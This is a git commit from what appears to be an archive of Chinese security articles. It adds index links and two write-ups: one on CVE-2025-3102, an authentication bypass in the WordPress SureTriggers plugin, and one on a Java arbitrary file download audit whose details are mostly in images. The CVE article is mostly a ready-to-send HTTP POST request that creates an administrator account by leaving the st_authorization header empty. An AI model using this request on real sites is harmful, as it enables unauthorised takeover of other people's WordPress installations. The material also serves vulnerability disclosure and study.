CVE-2025-3102 WordPress 任意用户创建、一次任意文件下载漏洞审计-JAVA、

This commit is contained in:
test 2025-05-18 08:22:04 +00:00
parent f6009e32fb
commit 4c6b6c25a6
3 changed files with 80 additions and 1 deletions

View File

@ -14170,5 +14170,7 @@
"https://mp.weixin.qq.com/s?__biz=Mzk0Mzc1MTI2Nw==&mid=2247490419&idx=1&sn=f6b7aaec4d6701d21a500eb2b6ebbd6e": "ruoyi系统 4.8 后台RCE漏洞分析",
"https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247491505&idx=1&sn=84eec4161e98e58aec50bd9fecbf5396": "SysAid On-Prem XML注入漏洞 (CVE-2025-2776)",
"https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247491496&idx=1&sn=2d48823e684397a854cefe1dd038c7f0": "妖气山视频管理系统 get_media_list_by_filter.json SQL注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247550042&idx=1&sn=604860dbff6fda380161cf44215eec8d": "重生HW之利用邮箱漏洞寻找突破口打穿目标内网"
"https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247550042&idx=1&sn=604860dbff6fda380161cf44215eec8d": "重生HW之利用邮箱漏洞寻找突破口打穿目标内网",
"https://mp.weixin.qq.com/s?__biz=Mzg2NTk4MTE1MQ==&mid=2247487437&idx=1&sn=cbff3bf4a41066854aa33d6262681406": "CVE-2025-3102 WordPress 任意用户创建",
"https://mp.weixin.qq.com/s?__biz=MzkyMjM5NDM3NQ==&mid=2247486456&idx=1&sn=f64fd15960ac4cab2aa9ba2cf4ae110d": "一次任意文件下载漏洞审计-JAVA"
}

View File

@ -0,0 +1,29 @@
# CVE-2025-3102 WordPress 任意用户创建
TtTeam 2025-05-18 04:34
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0HlywncJbB21sQDibn3bRriatWfAzWwcS2icLcvXwOId2KOyGxyURgf55s7U43OWqhGjnuM83zagBEVWlvmXYD44A/640?wx_fmt=png&from=appmsg "")
SureTriggersWordPress 的一体化自动化平台插件容易受到身份验证绕过的影响由于缺少对“secret_key”的空值检查导致创建管理帐户。
```
        POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Content-Type: application/json
        st_authorization: 
        {
          "integration": "WordPress",
          "type_event": "create_user_if_not_exists",
          "selected_options": {
            "user_email": "test@example.com",
            "user_name": "testuser",
            "password": "Test@1234"
          },
          "fields": [],
          "context": {}
        }
```

View File

@ -0,0 +1,48 @@
# 一次任意文件下载漏洞审计-JAVA
原创 知名小朋友 进击安全 2025-05-18 02:00
**免责申明**
本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
一、前言
    突然电脑里面多了一套源码然后开始审了审是以jar包启动的虽然最终拿到了鉴权绕过以及任意文件上传但是不解析JSP所以没什么用处这里挑其中的任意文件下载漏洞讲一讲。
二、审计流程
    这里其实一
眼就可以定位到
Controller层。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhVly8qplaE54SHodo51qict8BiaPjIeebZfjaqF2ewr5xyhZpALaNVQf5LRwtvh4eLDwicTHBQOL0zzA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhVly8qplaE54SHodo51qict8SFyRGMYCHBkv2px7yF0eeydCGhDlT0TTZ2JuNUwzQdrM1JQNiciatJwQ/640?wx_fmt=png&from=appmsg "")
在类当中还是比较明显的。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhVly8qplaE54SHodo51qict8ysIl2MO2pOEjVzCUVPrdTuBicHJ1muxWPOlLvHGxXb0kzmyQpw6iaOIg/640?wx_fmt=png&from=appmsg "")
这里传递进去了参数path并且给到了downloadFileStand方法跟入方法进行查看。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhVly8qplaE54SHodo51qict89Cicd029KOMjEzbYqHeLKN3GEoO0yUfAEGBgh9eSUdCJHKILzX4Tl9w/640?wx_fmt=png&from=appmsg "")
可以看到这个if判断也没有起到实质的作用最终还是通过Header头设置进行把文件下载出来了。
三、漏洞验证
    这个功能本来是后台才可以访问的,但是刚好在鉴权当中存在一些逻辑缺陷导致可以进行绕过,不过由于特殊性就不做过多的解释了。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhVly8qplaE54SHodo51qict8XEkwWkd9FwfPKWpTGf52HupDgWJtTvnZ3X115jEw9wFFZmPdS20gCg/640?wx_fmt=png&from=appmsg "")
四、完结
     代码审计第四期富含PHP、JAVA、NET代码审计顺带APP、小程序、WEB当中参数逆向以及JAVA工具二开与SRC案例讲解其中多多0day讲解实战案例分析不拿着靶场去做想学习速速报名了。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhUicibrBmrZ2iazoDJic2RyDklw4547e6aNia1OEMntI6wGqRdvr87XVgUdiaiczwW67bRO3iayvd7H7bZoeQ/640?wx_fmt=png&from=appmsg&tp=wxpic&wxfrom=13&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/ZRKuxIKRyhXhuxbCGecu4ibia3kSXD8ePQHrSvPSNtC7PmjzQwR88Hu0LpuXdQzamKBCPAXX82anLS8f0FF3LzzQ/640?wx_fmt=jpeg "")